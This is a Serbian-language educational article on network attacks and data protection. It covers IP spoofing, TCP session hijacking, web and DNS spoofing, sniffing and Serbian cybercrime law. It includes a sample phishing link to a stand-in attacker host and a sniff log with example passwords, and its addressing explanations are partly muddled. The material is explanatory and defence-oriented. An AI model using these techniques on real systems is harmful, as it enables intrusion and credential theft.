1. Svima je naravno poznato da svaki komp na netu ima svoju IP kao i serijski broj za za svaki IP paket koji komp posalje na internet. Ovo se moze odraditi ovako:

- IP adresu je moguce dobiti od servera, gledajuci statusbalk od browsera presretanjem paketa (packet sniffing)na networku. Ako jedan sistem ima napr. IP-192.0.0.15 to je jedan klase C network (128+64=192bits) sto znaci da moze da ima max 256 Ip-adrese (192.0.0.1-254) tako   da on pokusava da pogodi jednu adresu u ovom IP-rangeu i da se predstavi serveru kao klient iz njegovog sopstvenog networka (internog). Ako mu to uspe on moze da monitoruje TCP/IP data-stream na networku i posle odredjenog vremena mu moze uspeti da ih na osnovu odredjenog algoritma uspesno predvidi serijske brojeve TCP/IP paketa izmedju klijeta i servera i da tako preuzme ulogu jednog od klijenata na servervom networku i da ga ubedi da dobija informacije od svog klijenta a ustvari ih dobija sa hakerove machine. Na taj nacin haker moze da monitoruje data stream na networku sto ukljucuje login names, passworde, poverljive podatke itd. Ovo se obicno radi kao priprema napada na server ili na neki drugi server na istoj mrezi.


2. TCP-IP paket interception ili aktivno snifovanje. Ovo je jedan od najopasnijih oblika napada na jedan server koji je prikljucen na jedan TCP/IP network. U ovom slucaju haker ne pokusava da pogadja IP-adrese vec presrece TCP/IP konekciju izmedju trusted(verovanog) klijenta na networku i servera i primorava  server da hakerovu masinu na taj nacin prihvata kao trusted-host. Na taj nacin on simulira IP adresu i seriske brojeve TCP/IP paketa od zrtve kompjutera (to je takozvano IP-mimic (imitiranje)). Posto se on sada prestavlja kao trusted  host on baj-pasuje login i password indetifikaciju i moze da prodre do vise obezbedjenih sistema i preuzme kontrolu na njima. Pasivno snifovanje jedan dobro postavljeni network sniffer moze da monitoruje TCP/IP data-stream i da na taj nacin dodje do login namea i passworda od odredjenog racuna i da ga kopromituje i koristi kao bazu za provaljivanje super userovog passworda ili nekog drugog racuna sa visim privilegijama. (sto mu obicno pre ili kasnije uspeva). Isto tako ova tehnika se koristi i kao pocetna faza za sledece vrste napada:


- Napad aktivnom desinhronizacijom

U principu generiradje ogromnog broja ACK-paketa (acknowledgment) zbog prekida veze izmedju klijenta i servera;


- Napad ranom desihronizacijom

Ovo se zasniva na prekidanju veze izmedju klijenta i servera u jednoj ranoj fazi i zapocinjanju nove veze sa  masine napadaca sa (novim) serijskim brojem (a pod identitetom klijenta sa kojim je veza prekinuta);


- Napad sa desihronizacijom sa tzv. "zero-data"

Kao sto mu ime kaze ovaj napad se zasniva na slanju ogromnog broja tzv. Nula data serveru i klijentu (koje ne sadrze nista) koji nisu vidljivi ali primoravaju server i klijent da prekinu konekciju zbog preopterecenjaTCP/IP konekcije;


- Napad na Telnet-sesiju

Izvodi se slanjem velikog broja instrukcija specificnih za Telnet (IAC NOP IAC NOP) koji navodi Telnet protokol da pauzira i ceka sto napadac koristi da bi preuzeo kontrolu nad konekcijom i "umuva se unutra izmedju".


Zastita od ovakvih vrsta napada se sastoji u pazljivom monitorovanj i logovanju svih network aktivnosti i zapisivanju svega neobicnog (na primer neobicno velike procentaze ACK paketa na networku ) kao i u vodjenjem kriptografskih tehnika (Kerber-ove kartice, SSL.S-HTTP, one time passwords, firewalls itd …)




Web tehnike i opasnosti



Jedna od najopasnijih i najinteresatnijih tehnika na Webu je takozvani Web emulation ili virtual-web gde haker peuzima celu ulogu Web servera i naterava vas da verujete da imate vezu sa hakerovom machinom dok vi verujete da imate vezu sa oderedjenim web-serverom.Na taj nacim on ima potpunu kontrolu nad svim podacima u oba pravca. Na primer vi zelite da napravite konekciju da serverom www.mojabanka.com. Ono sto napadac radi je da sve linkove i konekcje loaduje (puni) preko svoje masine dodavanjem na svaki URL-link svoju web-adresu npr www.napadacevamakina.com tako da to postaje http:/napadacevamakina.com/www.mojabanka.com. Na taj nacin svaka  transakcija ide preko hakerove machine i daje mu potpunu kontrolu nad svim podacima u oba pravca (full dupleks).


Hiperlink - imitiranje

Slicna tehnika se koristi i u ovom slucaju samo sto ovo vazi za pojedine linkove sa oderedjene Web-strane (koja moze da bude auteticna) koji bi trebalo da vas odvedu na oderdjenu stranicu a ustvari vas odvode negde sasvim drugde (mada ta stranica izgleda potpuno autenticno). Na primer u HTML programu Web strane (hakovane) stoji ovako nesto:

<A HREF=https://www.napadac.com/getuserinfo
>Click here for free porn !!!</A>

Gde se nalazi oderedjeni program koji grabi od vas poverljive podatke i slaze ih ih u odredjenu databazu. Zato budite extremno oprezni sa slanjm poverljivih podataka preko Web-a cak i preko kriptovanih i "secure" servera jer ni oni nisu 100% zastita i mogu biti hakovani.



Jedna veoma dobrih tehnika je i DNS-mimic gde se potpuno obilazi firewall na taj nacin sto se prvo kod napadacevog DNS servera (koji je zaduzen da prevodi IP-adresa u imena sajtova) stavlja link na stranu sa istim imenom kao strana zrtve (na primer www.sajtzrtve.com) na kojoj se mogu pisati uvredljive stvari o zrtvi postaviti obscene slike ili siriti dezinformacije o zrtvi i propaganda protiv nje, a onda se napda DNS server zrtve (ako nije dobro obezbedjen) gde se menja link za DNS adresu za zrtvinu stranu tako da se povezuje sa DNS serverom napadaca. I Tako ko god na primer ukuca www.serbiancafe.com adresira DNS server napadaca koji ga upucuje na napadacevu Web stranu koju on moze urediti kako hoce...


Drugi nacin baj-pasovanja firewalla je kod organizacija koji koriste dial-up konekcije (paralelno sa LAN) Tako da kompjuter koji se preko modema povezan sa Web-om moze biti napadnit Trjancem ili BO ili necim slicnim a onda biva koriscen kao baza za napad na ostali deo netwerka. Posto napadac ulazi kroj dial-up liniju preko modema on na taj nacim zaobilazi firwall na LAN-u.

Pojam zaštite  elektronskih podataka


Godinama se napad na računarske mreže rešavao dobrim katancem i pravilnim zaključavanjem kancelarije koje imaju računare sa osetljivim podacima. Bilo je dovoljno imati i dva čuvara čiji bi posao bi da paze da neko fizički ne provali u kancelariju i tu na licu mesta pokuša da prisvoji ili uništi određene podatke koje smo hteli da sačuvamo.

Uvođenjem računarske mreže u kancelarijski način rada a posebno sa uvođenjem interneta i klijent/server arhitektura sam  koncept zaštite elektronskih podataka morao je da doživi dramatičnu promenu.

Sada više nije bilo neophodno biti fizički prisutan u prostoriji gde se nalazi računar na kome se nalaze poverljivi podaci. Napad je mogao biti izvršen i iz susedne prostorije ili sa drugog kontinenta, a podaci preneseni bez vidljivog uznemiravanja čuvara koji su sedeli ispred prostorije.

Koncept sigurnosti je sada shvatan ne kao fizičko obezbeđivanje prostorije već kao niz sofisticiranih tehnika i metoda kojim bi sam računarski sistem bio zaštićen i obezbeđen.



Pojam zaštite elektronskih podataka (pravni aspekt)


Predlogom novog krivičnog zakonika definisani su kriterijumi šta se sve može smatrati pod krivičnim prekršajem vezano za temu računara i računarskih komunikacija.

•        Neovlašćeni pristup i korišćenje računarskih sistema i mreža
•        Namerno oštećivanje računarskih programa i podataka- Sabotiranje rada računarskih sistema i mreža
•        Pravljenje virusa i njihovo unošenje u računarske sisteme
•        Ometanje funkcionisanja sistema za elektronsku obradu podataka i računarskih mreža
•        Povreda tajnosti elektronske pošte
•        Sprečavanje ili ograničavanje pristupa računarskim mrežama
•        Neovlašćeno prikupljanje i objavljivanje privatnih fotografija, spisa i ličnih podataka
•        Prisluškivanje
•        Uvreda i kleveta
•        Objavljivanje zabranjenog pornografskog materijala (pedofilija)
•        Posredovanje u vršenju prostitucije
•        Povreda intelektualne svojine (copyright)
•        Narušavanje poslovnog ugleda
•        Oštećivanje mrežnih kablova
•        Terorizam- Špijunaža
•        Izazivanje panike i nereda
•        Udruživanje radi vršenja kriminalnih dela (ugovaranje akcija, prikrivanje dokaza, itd)

Član 34 krivičnog zakona o kompijuterskom kriminalu

Svi ovi predlozi zakona imaju jako dobru osnovu, međutim problem koji se javlja  leži u samom okviru zakona, “Nevin dok se ne dokaže krivim” , jer mogučnost dokazivanja ovakve vrste kriminalnih radnji  graniči se sa teoretskom  neverovatnošću,  iz   jednostavnog razloga što kod nas  nepostoji obučen pravosudni kadar koji  bi  mogao da procesira ovakav slučaj.  Što znači , da ukoliko se  počinilac sam  neprijavi, skoro da nepostoji šansa da mu se uđe u trag.

U Srbiji se trenutno obučava na desetine sudija, tužilaca i branioca za ovu vrstu kriminalnih radnji, tako da će u skorije vreme i kod nas postojati "realniji" strah od zakona na internetu.



Podela mogućih napada na računarsku mrežu


Za samu računarsku mrežu pojmovi blizu ili daleko imaju potpuno promenjeno značenje.

Pod lokalnim pristupom (local access) smatra se rad korisnika koji je uredno prijavljen na računarski sistem i sve radnje obavlja na samom sistemu (rad u shell-u, kontrolisanje elektronske pošte ili surfovanje sa samog računara- lynx ) odnosno kada je početna adresa korisnika jednaka krajnjoj adresi.

Pod pristupom na daljinu (remote access) podrazumevamo rad pri kojem korisnikova početna adresa paketa nije ista kao i krajnja adresa servera na kome radi.

Pojavom UNIX/LINUX kao operativnih sistema koji u potpunosti podržavaju mrežni rad, stvari se još dodatno komplikuju.

Kada korisnik sa svog računara pokušava da inicira sesiju na nekom serveru sam pristup tom serveru se smatra kao pristup na daljinu (remote access) ali sav rad koji obavlja na tom serveru, a tiče se samog boravka na serveru, se smatra radom u lokalu. (primer remote access ssh sesije na jedan server, ali se čitanje pošte iz PINE smatra lokalnim pristupom, jer za taj server sam program i jeste iniciran iz lokala)

Samim tim pri zaštiti računarskih mreža moramo voditi računa i o jednom i o drugom pristupu kao o načinima na koji se potencijalno može ugroziti sigurnost.

Kada pričamo o napadu na računarsku mrežu moramo kvalifikovati sam pojam napada, šta on znači za nas i kako se odražava na nas kao vlasnike računarske mreže.

Napadom na računarsku mrežu se smatra svaka aktivnost koja je usmerena ka tome da izazove ugrožavanje privatnosti, usporavanje ili ometanje normalnog odvijanja procesa rada u samoj računarskoj mreži.

 Sami napadi na računarsku mrežu i sisteme mogu se podeliti na sledeće kategorije:

•        ugrožavanje privatnosti
•        zloupotrebe elektronske pošte
•        potpuno ili delimično prekidanje servisa (Denial of Service)
•        neovlašćeno ulaženje na računarski sistem




Privatnost kao pojam


Privatnost je moć da se kontroliše ono što drugi ljudi znaju o vama. Tačnije: to je mogućnost da se kontroliše istina o vama koju ostali ljudi znaju.

Privatnost je zasnovana na našoj sposobnosti da krijemo istinu.
 
Postoje dve vrste podataka koje zakon pokušava da zaštiti:

1. podaci koje smo nekome poverili, ili podaci koje je neko drugi prikupio o nama,
2. podaci o nama koje držite u tajnosti, koji su samo nama poznati.

Prva vrsta privatnosti koju bi zakon trebao da štiti – jeste privatnost informacija. Ako ste učinili javnom informaciju o vrednosti vaše kuće, stavljajući je pod hipoteku u sudu, ipak želite kontrolu nad dostupnošću tih podataka ostalima. Ili ako ste u apoteci kupili test za proveru trudnoće, i isti platili kreditnom karticom (time otkrivajući svoj identitet), i dalje ne želite da ta informacija bude dostupna svima u vašem gradu.

Druga vrsta privatnosti nam je poznatija: koliko novca imate u novčaniku, šta pišete u pismima svojoj dragoj(om), koje programe gledate na televiziji, šta mislite o javnim ličnostima, političarima...

To su sve informacije koje bi smo želeli da zadržimo samo za sebe.
 
Sama privatnost naši podataka može biti ugrožena i zloupotrebljena na više načina:

Ugrožavanje privatnosti prisluškivanjem gde je cilj sakupiti što više informacija o određenoj osobi

Ugrožavanje privatnosti e-mail poruka – (od strane poslodavca, kolega, trećih lica, državnih organa ...)

Ugrožavanje privatnosti davanjem sakupljenih informacija o nama trecim licima koja su za njih zainteresovana (internet oglašivačima, prodavcima određenih proizvoda i sl.)



Ugrožavanje privatnosti prisluškivanjem


Sam metod prisluškivanja (eng sniffing) zasniva se na osnovnim principima rada mreže gde paketi putuju od jednog do drugog računara pokušavajući da stignu do svoje krajnje odrednice – računara kome želimo da pristupimo.

U svakodnevnom radu i komunikaciji između dva računara najčešće korišćena komanda za prelaz sa jednog na drugi računrar putem mreže je komanda telnet,  stim da se telnet ne uzima kao jedini vid pristupa  ka nekom odredišnom računaru .

Način uspostavljanja veze između dva računara je sledeći (recimo da se  nalazimo na računaru A, a B je računar na koju se "telnetujemo"):

1. A  -----SYN----> B               

2. A <---SYN/ACK--- B     

3. A ACK----> B
 

Najpre računrar A šalje zahtev za otvaranjem konekcije (SYN). Zatim računrar B odgovara sa tzv. SYN/ACK potvrdom da je zahtev za otvaranjem konekcije od strane klijenta A prihvaćen i u trecem koraku klijent uspostavlja vezu sa serverom B.

Recimo da klijent A ima IP adresu 66.66.66.66 a server B 66.66.66.99.

Konekcija koja se formira od mašina A ka mašini B putem koje se šalje sve što mi kucamo će imati oblik: 66.66.66.66.3456-66.66.66.99.23.  Povratne informacije ka klijentu A se šalju putem: 66.66.66.99.23-66.66.66.66.3456.  Pretpostavimo da se A i B nalaze na istoj mreži sa računarima C, D, E, F itd.

 

                                A-------------------------------B
                                                  \     \    \     \
                                                   C     D    E   F

 


Ukoliko neko znatiželjan ima fizički pristup nekom od računara C, D, E, F sve što treba da uradi je da pokrene neki eternet sniffer i svako slovo koje otkucamo će se pojaviti ili u sniff log fajlovima ili na ekranu u zavisnosti od same konfiguracije snifera. Tipičan sniff log izgleda ovako

................vt100..................neko.PaswOrd1.w. ps -u ivana...ls -ald /var/mail/vana....su.idiot96.clear. cd /var/mail.tail -f ivana...more ivana.cat .cd.w.ps -u ivana .finger ivana...cd /var/mail.cat ivana...id


Tačkicama su zamenjeni specijalni karakteri, kao npr ^M za return. Iz ovoga sniff loga moze se lako utvrditi da korisnik neko kao identifikaciju koristi password “PaswOrd1”. Dalje, može se utvrditi da je taj korisnik veoma zainteresovan za korisnicu “Ivana”. Takođe se može primetiti da taj korisnik zna root-ov password i da je putem komande su postao root ( pod pojmom root podrazumevamo fizički pristup hardveru na računaru na kojoj se kao operativni sistem koristi UNIX). Takođe se moze videti da je root-ov password u ovom slučaju “idiot96”, kao i da se korisnik “neko” intenzivno interesuje za sadržaj

mail–a korisnice sa usernamom “ivana”.

Gore navedeni primer je veoma poučan, jer pokazuje koliko je lako ugroziti nečiju sigurnost podataka i da je korišćenje telneta neopravdano i veoma opasno. Dovoljno je sačekati da korisnik pod imenom “neko” ne bude ulogovan na računrar jer bi bilo suludo biti ulogovan na kome su ovi podaci važeći i iskoristiti ih . Računar host neće znati  na osnovu unetih podataka da li je to stvarno korisnik neko ili ne.

Ipak, nameće se pitanje: zašto bi nekoga uopšte zanimao naš username/password? Razlog je veoma jednostavan. Normalne instalacije UNIX-a su na žalost veoma loše napisane. Ponekada je dovoljno samo pribaviti username i password i dobiti root pristup na računaru.